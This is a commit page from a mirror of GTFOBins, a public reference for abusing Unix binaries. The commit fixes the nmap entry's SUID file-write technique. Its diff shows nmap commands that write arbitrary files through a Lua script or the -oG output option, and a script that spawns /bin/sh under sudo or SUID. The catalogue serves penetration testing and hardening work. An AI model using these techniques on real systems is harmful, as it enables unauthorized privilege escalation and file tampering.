public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-12-25 22:40:10 +01:00
Code Issues Projects Releases Wiki Activity

Fix nmap SUID file-write

Browse Source
This commit is contained in:
Andrea Cardaci 2021-01-04 08:58:56 +01:00
parent edc8a2d03d
commit 5b2d89b99a
1 changed files with 8 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
_gtfobins/nmap.md
View File

@ -87,6 +87,10 @@ functions:
TF=$(mktemp) TF=$(mktemp)
echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
nmap --script=$TF nmap --script=$TF
- description: The payload appears inside the regular nmap output.
code: |
LFILE=file_to_write
nmap -oG=$LFILE DATA
file-read: file-read:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
@ -108,9 +112,9 @@ functions:
TF=$(mktemp) TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF echo 'os.execute("/bin/sh")' > $TF
./nmap --script=$TF ./nmap --script=$TF
- description: This will over-write files with nmap output, use with caution. suid:
- description: The payload appears inside the regular nmap output.
code: | code: |
sudo touch /etc/filecantbetouched LFILE=file_to_write
nmap 127.0.0.1 -oN=/etc/filecantbetouched ./nmap -oG=$LFILE DATA
cat /etc/filecantbetouched
--- ---